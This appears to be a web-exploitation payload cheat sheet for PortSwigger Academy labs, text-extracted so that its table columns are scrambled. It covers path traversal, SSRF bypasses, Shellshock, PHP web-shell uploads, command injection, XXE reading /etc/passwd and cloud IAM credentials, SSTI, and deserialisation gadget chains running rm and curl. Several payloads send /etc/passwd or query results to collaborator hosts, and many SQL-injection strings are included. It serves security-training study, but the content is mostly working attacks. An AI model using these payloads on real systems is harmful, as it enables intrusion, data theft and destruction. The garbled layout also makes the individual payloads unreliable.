Vulnerabi Observati

Test Case Payload Notes

lity on
Directory Absolute ?file=/
Traversal Path etc/passwd

# Using
nested
traversal
#
Linux : ....//
....//....//etc
Nested / //passwd -
>
Stripped
- FileName ../../../etc/p
Sequence asswd
s # windows
: ....\/....\/...
.\/windows\
/win.ini -
> ..\..\..\
windows\
win.ini

..%2F..
%2F..
%2Fetc
%2Fpassw
d
# or
URL
double URL
Encoding encode
..%252F..
%252F..
%252Fetc
%252Fpass
wd

Current /var/www/
Working images/../..
Directory /../etc/
Path passwd

Null Byte
?
if file
file=../../../
extension
etc/passwd
validation %00.png
is present

Loopback
SSRF http://127.0.0.1
Interface
 stockapi=h
ttp://
localhost/
admin
stockapi=h
ttp://
127.0.0.1:
22 #try
different
port
numbers
# Other
- StockAPI
things that
- Referer
resolves to
Header
127.0.0.1
- Next
213070643
Product
3
(OpenRedir
Bypassing 017700000
ect)
- On host Blacklist
001
- Register
header you
your own
get,
domain
CLIENT
that
ERROR
resolved to
Forbidden
127.0.0.1 (
burp
collaborato
r can be
used )
- Try
switching
b/w https:
http: etc

# Here we
Try URL
Encoding
 ostB ->
127.0.0.1:
https://host
80#@stoc
A/
k.weliketos
hop.net/
admin
https://
expected-
-> The
host:fakep
inspecting
assword@e
thing sees
vil-host
@ which
https://evil-
resolves to
host#expe
stock.welik
cted-host
etoshop.ne
https://
t
expected-
-> But due
host.evil-
to # being
host
present,
Bypassing
the rest
Whitelist # Check if host is
parsing
ignored
http://
and we get
127.0.0.1
access to
@stock.wel
admin
iketoshop.
panel
net:8080 -
-> Don't
> result ->
forget to
http://stock
encode #
.weliketosh
multiple
op.net:808
times (3x)
0
http://
#@ ->
localhost:8
localhost
0%2523@s
http://
tock.welike
localhost:8
toshop.net/
0%2523@s
Bypassing Will only
Through work if
<Refer-to-
Open open-
notes>
Redirectio redirect is
n present
Flawed
Request GET https://0ac500cf03eea421810858d600720083.web-security-academy.net/ HTTP/2Host: dr8j97
Parsing

SSRF via
Referer
Header
 -> Browse
the site
and send
the
product
page req
SSRF to intruder
Shellshoc ( identified
k by
collaborato
r
No space
everywher
between () { :; };
e)
User- echo "hello
-> Add the
Agent & world"
shellshock
payload () { :; };
payload in
/usr/bin/nsl
User-Agent
ookup $
User- String
(whoami).B
Agent:() { -> Send to
URP-
:; }; intruder &
COLLABOR
/usr/bin/n add
ATOR-
slookup $ payload to
SUBDOMAI
referer
(whoami). N
that is
xtulb4ze9 http://192.
r38qbyrzf 168.0.<p>
4h5yhkfbl :8080
29xxm.oa ->
stify.com Bruteforce
for the IP
range and
on the
right one,
you will
get a

<?php
File echo
File
file_get_co Create
Upload Upload
ntents('/ho shell.php &
Vulnerabi with no
me/carlos/ upload it
lities validation secret'); ?
>

Upload the
- Profile
# Change shell as is,
File Upload
Change to just
- Comment
file upload MIME type
image/jpeg change the
image/png content
(stage-3)
type
 If
uploaded,
but not
executed,
change the
Change directory,
the file the file is
upload uploaded
directory to
location
-
/files/avata
r/1.php
to
/files/2.php

# .htacces
s
AddHandle
r
application
/x-httpd-
php .php .p
hp5 .html .
htm

Override # Override
web.config `.htaccess`
Server
<staticCon or
Configura tent> `web.confi
tion File g` file
<mimeMa
p
fileExtensi
on=".json"
mimeType
="applicati
on/json" />

</staticCo
ntent>
 .php5
.shtml
- Case-
sensitive
Validation :
changing
`.php` to
`.pHp`
- Provide
multiple
extensions
`exploit.ph
p.jpg`
- Add
trailing
characters
`exploit.ph
Bypass p.`
Blacklist - Try URL
encoding
`exploit
%2fphp`
- Null Byte
`exploit.as
p;.jpg` or
`exploit.as
p%00.jpg`
- If non
recursive
validation
is there,
then try
`exploit.p.
phphp` ->
`exploit.ph
p`
Magic GIF87a
Bytes GIF89a
 1. When
file is
uploaded
2. When
file is
accessed

In lab, the
file is
- Send uploaded
both on the
request server for
`req-to- a short
upload` & period of
`req-to- time,
access` to scanned
and then
the
Race removed if
repeater, malicious
Condition
an add nature
them to detected.
same tab The small
group, timeframe
and run between
the upload and
attacks as removal,
` we can get
the
contents of
the file.

Upload the
file and
then
quickly
send
Upload
Client Side
JS
Upload
using PUT
method
 # Linux
whoami
uname -a
ifconifg
netstat -an
OS ps -ef
Normal
Command # Windows
Injection
Injection whoami
ver
ipconfig
/all
netstat -an
tasklist

- Submit
Feedback
Blind & ping -c
Section
Injection - 10
- Comment
Time 127.0.0.1
Param
Delays &
- Email
Param

& whoami
Redirect
>
response
/var/www/i
to a file on
mages/out.
server
txt &

Out of & nslookup

band <collabora
techniques tor> &

& nslookup
Exfiltrate `whoami`.
Data <collabora
tor> &
 # Both
windows &
unix
&
&&
|
||

# Only
Other
unix
Ways
;
0x0a or \n
( new line
character )

# To inject
commands
`pwd`
$(pwd)

<?xml
version="1
.0"
encoding=
"UTF-8"?>
<!
DOCTYPE
test [ <!
ENTITY xxe
SYSTEM
"file:///etc/
passwd">]
XXE Reading >
Injection Local Files <stockChe
ck>
<productId
>
&xxe;
</
productId>
<storeId>
1
</storeId>
</
stockCheck
>
 <?xml
version="1
.0"
encoding=
"UTF-8"?>
<!
DOCTYPE
test [ <!
ENTITY xxe
SYSTEM
"http://169.
254.169.25
- ProductID
4/latest/me
& storeID
ta-data/ia
- File Getting
SSRF m/security-
Upload IAM secret
credentials
Comment /
/
Profile
admin"> ]
>
<stockChe
ck><produ
ctId>&xxe;
</
productId>
<storeId>
1</
storeId></
stockCheck
>
 <?xml
version="1
.0"
encoding=
"UTF-8"?>
<!
DOCTYPE
test [ <!
ENTITY xxe
SYSTEM
"http://zadr
mxhk4hm6
umwbcqzo Getting out
Out Of Band
rtumjdp4d of band
Techiques
x1m.oastif interaction
y.com/"> ]
>
<stockChe
ck><produ
ctId>&xxe;
</
productId>
<storeId>
1</
storeId></
stockCheck
>
 <?xml
version="1
.0"
encoding=
"UTF-8"?>
<!
DOCTYPE
stockCheck
[<!ENTITY
% xxe
SYSTEM
Out Of Band "http://96d
Interaction 1i7du0rigq Using
Using wsl80vyn3 parameter
Parameter qwfnle98x entities
Entities x.oastify.co
m"> %xxe;
]>
<stockChe
ck><produ
ctId>1</
productId>
<storeId>
1</
storeId></
stockCheck
>
&#x25;
exfil
SYSTEM
'http://vpo
n1twgjd12
9ib7rmek6
p9iy940sw
gl.oastify.c
om/?x=
%file;'>">
%eval;
%exfil;

# Request
Body
<?xml
version="1
.0"
encoding=
"UTF-8"?>
<!
DOCTYPE
foo [<!
ENTITY %
xxe
SYSTEM
"https://ex
ploit-
0a2d00b50
48796ef82
fced7301af
009a.explo
it-
server.net/
exploit">
%xxe;]>
 &#x25;
exfil
SYSTEM
'file:///inval
id/%file;'>"
>
%eval;
%exfil;

# Request
Body
<?xml
version="1
.0"
encoding=
Changed
"UTF-8"
content
Blind XXE standalone
type to
retrieve data ="no"?>
XML and
via error <!
then
messages DOCTYPE
exploited
foo [<!
it.
ENTITY %
xxe
SYSTEM
"https://ex
ploit-
0a7900b90
4d9860980
06d9c301d
9009d.expl
oit-
server.net/
exploit.dtd
">
%xxe;]>
<root>
productId=
<foo+xmln
s%3axi
%3d"http
%3a//
www.w3.or
g/2001/
XInclude">
XInclude
<xi
( where XML
%3ainclud
is formed on
e+parse
server side )
%3d"text"
+href
%3d"file
%3a///etc/
passwd"/
></
foo>&store
Id=1
 <?xml
version="1
.0"
standalone
="yes"?
><!
DOCTYPE
test [ <!
ENTITY xxe
SYSTEM
"file:///etc/
hostname"
> ]><svg
width="12
Create SVG
8px"
image with
height="12
XXE via File the
8px"
Upload payload
xmlns="htt
and
p://www.w
uploadd
3.org/2000
/svg"
xmlns:xlink
="http://w
ww.w3.org/
1999/xlink"
version="1
.1"><text
font-
size="16"
x="0"
y="16">&
xxe;</text
></svg>
 The
website
sends
request for
a product
and on
error
redirects
the user to
page
saying
ERB
`Unfortuna
SSTI Template # Detection<%= 7*7 %># Exploitation<%= system("whoami") %># Exfiltrating Data<%= system("cur
tely this
RUBY
product is
out of
stock` with
this
message in
the ?
message
parameter,
that's
where we
inject.
# Indicators

-
Unfortunatel
y this
product is
out of stock (
on the main
page ).
-?
messsage=
- Preferred
Name : first,
The
last,
injection is
nickname
- Blog edit Tornado injected
template into a code
Template
- HTML context &
Python :
Injection in order
# Detection{{7*7}}# to Contextuser.name}}{{7*7}}# Exploitation{% import os %}{{os.system('rm /h
Code
Escaping
possible but Code escape it,
not XSS Context you need
to close
the
context.
Free Marker
Java
# Detectionhttps://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20T
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20
{ Manually
Find Out }
 string.sub h (lookup
"constructo string.sub
r")}} "constructo
r")}}
{{this.pop
}} {{this.pop
}}
{{#with
string.split {{#with
as | string.split
codelist|}} as |
codelist|}}
{{this.pop
}} {{this.pop
}}
{{this.pus
h "return {{this.pus
Handlerbars
require('chi h "return
{ Manually https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20
ld_process' require('chi
Find Out }
).exec('rm ld_process'
morale.txt' ).exec('curl
);"}} -F
file=@/etc/
{{this.pop passwd
}} https://r0s
gybqn6bd4
{{#each psqrkj5odp
conslist}} ygh7nybp3
ds.oastify.c
{{#with om/');"}}
(string.sub.
apply 0 {{this.pop
codelist)}} }}

{{this}} {{#each
conslist}}
 {{ 7*7 }} :
gives error
with
django
templates
ih0vr{{364
|
add:733}}
d121r ->
ih0vr1097d
121r

#
Exploitatio
n
Django
{% debug
Template
%} # find https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20
{ Manually
the object
Find Out }
`settings`,
look it up
online,
you'll find
an
attribute
SECRET_KE
Y

{{settings.
SECRET_KE
Y}} #
asking
object
settings for
attribute

# Original
O:4:"User":
2:
{s:8:"usern
ame";s:6:"
wiener";s:5
Getting
:"admin";b:
Access to
0;}
Insecure Modifying admin
Deserialis Serialised panel by
#
ation Objects changing
Tampered
the
O:4:"User":
username
2:
{s:8:"usern
ame";s:6:"
wiener";s:5
:"admin";b:
1;}
 # Original Getting
O:4:"User": access to
2: admin
{s:8:"usern account,
- Serialised ame";s:6:" by
session wiener";s:1 exploiting
cookie 2:"access_t how php
- Base64 oken";s:32: treats JS,
decode "c0fpqkjg6 'adasdasda
and 67odl5i52g '=='0' will
identify 20g9r9714 be true, as
Modifying
- The error lnns";} php will
Datatypes
you should convert the
be looking # string in
for is Tampered number
java.io.Stre O:4:"User": and if the
amCorrupt 2: first
edExceptio {s:8:"usern character
n ame";s:13: is a
"administr number,
ator";s:12:" it'll be true,
access_tok otherwise
en";i:0;} false
 # Original
O:4:"User":
3:
{s:8:"usern
ame";s:6:"
wiener";s:1
2:"access_t
oken";s:32:
"ynuxehl8lr
ouh4fxaxri
1bsylz8047
gs";s:11:"a
vatar_link";
s:19:"users
/wiener/
avatar";}
Deleting File
Deleting or
/ Reading #
accessing
File of some Tampered
carlos's file
other user O:4:"User":
3:
{s:8:"usern
ame";s:6:"
wiener";s:1
2:"access_t
oken";s:32:
"ynuxehl8lr
ouh4fxaxri
1bsylz8047
gs";s:11:"a
vatar_link";
s:23:"/
home/
carlos/
morale.txt"
;}
 Deleting or
accessing
carlos's file

O:14:"Cust - View
omTemplat source,
e":1: you might
Arbitrary {s:14:"lock find a php
object _file_path"; file
injection in s:23:"/ - We use
PHP home/ the class
carlos/ exposed in
morale.txt" the php file
;} and use it's
constructor
method to
delte the
file

java -jar
- Indication
ysoserial-
`ac ed` or
all.jar
Exploiting `rO0`
CommonsC
Java present in
ollections4
deserializati the
'rm
on with beginning
/home/carl
Apache of session
Commons os/morale.t cookie/
xt' |
serialized
base64 -
data
w0
 reveals OjY6IndpZ
anything W5lciI7czo
about the xMjoiYWNj
framework ZXNzX3Rv
in use a2VuIjtzOj # TO Sign
MyOiJtajVn <?php
- Step 2 : dG5tdzBya $object =
Once zhvbXExd "OBJECT-
identified WthMmU2 GENERATE
the eG14aWQ5 D-BY-
framework, Ynl4MSI7fQ PHPGGC";
which is ==","sig_h $secretKey
`Symfony mac_sha1" =
Version :"4f828b6d "LEAKED-
- Here the
4.3.6`, use 6dd88d337 SECRET-
Exploiting token is
phpgcc to cdb12c447 KEY-FROM-
PHP signed,
create 243560f36 PHPINFO.P
deserializati hence we
payload e8376"} HP";
on with a would
./phpggc $cookie =
pre-built need the
gadget chain Symfony/R secret key urlencode('
CE7 exec {"token":"'
to sign it.
'rm ./phpggc . $object .
/home/carl Symfony/R '","sig_hma
os/morale.t CE7 exec c_sha1":"' .
xt' | 'curl -F hash_hmac
base64 - file=@/etc/ ('sha1',
w0 passwd $object,
https://qnh $secretKey
- Step 3 : 45rouxc7d ) . '"}');
Before we alerob7v00 echo
can use xympsgga $cookie;
this, we 4z.oastify.c
would om' |
need to base64 -
sign it w0

Run Code
in your
BSCP
directory
on :
Exploiting https://one
Ruby compiler.c
deserializati om/ruby/4
on using a 28epcnus
documented
gadget chain Then run
echo
"payload" |
base64 -d |
base64 -
w0 & copy
 Bolean admin' -- -
SQL
Based SQL admin' AND
Injection
Injection 1=1-- -
category=
Determinin
Pets'
g the
UNION
column
SELECT
datatype
NULL,NULL
' UNION
-- -
SELECT
'a',NULL,N
/filter?
ULL,NULL--
category=
' UNION
Pets'
SELECT
UNION
NULL,'a',N
SELECT
ULL,NULL--
table_nam
' UNION
e,NULL
- SELECT
FROM
TrackingID NULL,NULL
informatio
Cookie : ,'a',NULL--
n_schema.t
BlindSQL Union Based ' UNION
ables-- -
- Product SQL SELECT
Category : Injection NULL,NULL
/filter?
? ,NULL,'a'--
category=
category=
Pets'
pets #
UNION
Retrieving
SELECT
Informatio
column_na
n From
me,NULL
Database
FROM+info
rmation_sc
# Getting
hema.colu
Tables
mns
SELECT *
WHERE
FROM
table_nam
informatio
e='tb'-- -
n_schema.t
ables
/filter?
category=
 FROM
dual-- -

/filter?
category=
Pets'
UNION
SELECT
table_nam
e,NULL
FROM
all_tables--
-

/filter?
category=
Union Based
Pets'
SQL
UNION
Injection :
SELECT
Oracle DB
column_na
me,NULL
FROM
all_tab_col
umns
WHERE
table_nam
e='USERS_
OIDFJF'-- -

/filter?
category=
Pets'
UNION
SELECT
USERNAME
 /filter?
category=
Gifts'
UNION
SELECT
NULL,table
_name
Union Based FROM
SQL informatio
Injection : n_schema.t
Retrieving ables-- -
Data From
Multiple /filter?
Columns category=
into one Gifts'
UNION
SELECT
NULL,usern
ame||'~'||
password
FROM
users--
 `users`
exist
```bash
TrackingId
=xyz' AND
(SELECT 1
FROM
users LIMIT
1)=1-- -
```

-
Confirming
column
username
Blind SQL exists
Using
```sql
Conditional
TrackingId
Response :
=xyz' AND
Welcome
back (SELECT
username
FROM
users
WHERE
username
='administ
rator')='ad
ministrator
'-- -
```

-
Enumerati
ng the
password
 CASE
WHEN(1=2
) THEN 1/0
ELSE 1
END FROM
users
WHERE
username
='administ
rator')=1--
-

# Error :
here we
changed
the table
Error Based name to
Blind SQL : non
500 & 200 existing
and we get
the error
iXYYA0Jufu
svlWsS'
AND
(SELECT
CASE
WHEN(1=2
) THEN 1/0
ELSE 1
END FROM
usersss
WHERE
username
='administ
rator')=1--
 OKUELbuJ'
AND
1=CAST((S
ELECT 1)
AS int)--
```

- Now we
can use
this
conditional
behaviour
to
enumerate
tables
Error Based
Blind SQL : ```sql
Verbose TrackingId
Error =ogAZZfxt
Messages : OKUELbuJ'
Cast AND
1=CAST((S
ELECT
username
FROM
users) AS
int)--`
```

```bash
Unterminat
ed string
literal
started at
position 95
in SQL
 Confirming
table
`users`
exists &
username
administrat
or too

```bash
umnGRjvz
UWOjjA18';
SELECT
CASE
WHEN(user
name='ad
ministrator
') THEN
Blind SQL
pg_sleep(1
Using Time
0) ELSE
Delays
pg_sleep(0
) END
FROM
users-- -
```

-
Confirming
the
password
length

```bash
umnGRjvz
UWOjjA18';
SELECT
CASE
 6512b1807a
"UTF-8"? 2104000700
><! 17.web-
DOCTYPE security-
root [ <! academy.net
ENTITY % Cookie:
remote TrackingId=x
SYSTEM '+UNION+S
"http://5w2 ELECT+EXT
bez8il8dfy RACTVALU
gc8i0fkqa0 E(xmltype('<
s0j6au5iu. %3fxml+vers
oastify.co Paste it ion
m/"> directly in %3d"1.0"+e
%remote;] the ncoding
>'),'/l') request, %3d"UTF-
FROM encodings 8"%3f><!
Blind SQL DOCTYPE+r
dual-- - might
Using Out oot+[+<!
create
Of Band ENTITY+
# Lab : problems,
Techniques %25+remote
Exfiltrating so don't +SYSTEM+"
Data forget to http%3a//'||
troublesho (SELECT+p
TrackingId ot. assword+FR
=x'+UNIO OM+users+
N+SELECT WHERE+us
+EXTRACT ername
VALUE(xml %3d'adminis
type('< trator')||'.wqq
%3fxml+v 28q29fz76s7
ersion 6zcr9bk1uju
%3d"1.0"+ a01osngc.oa
encoding stify.com/">+
%3d"UTF- %25remote
8"%3f><! %3b]>'),'/l')
DOCTYPE+ +FROM+du
al--;
 <?xml
version="1
.0"
encoding=
"UTF-8"?
><!
DOCTYPE
root [ <!
ENTITY %
remote
SYSTEM
"http://'||
(SELECT
Blind SQL
password
via XXE
FROM
users
WHERE
username
='administ
rator')||'.7jr
l18kbtt3u6
2a8ks3cwh
tfi6oxco0d.
oastify.co
m/">
%remote;]
>
 returns back
with "Attack
Detected"

<storeId>1
<?xml UNION
version="1 SELECT
.0" NULL</store
encoding= Id>
"UTF-8"?
><stockCh # Now we
eck><prod try to bypass
uctId> it using
1 hackvertor
</ Extensions
productId> > Hackvertor
<storeId> > Encode >
Blind SQL in dec_entities/
<@hex_en
XML Data & hex_entities
tities>1
Bypassing
UNION
Firewall <@hex_entit
SELECT ies>1+UNIO
username N+SELECT
|| '~' || +NULL<@/
password hex_entities
FROM >
users
<@/ # Now we
hex_entitie craft the
s></ payload
storeId></
stockCheck <@hex_entit
> ies>
1 UNION
SELECT
username ||
'~' ||
password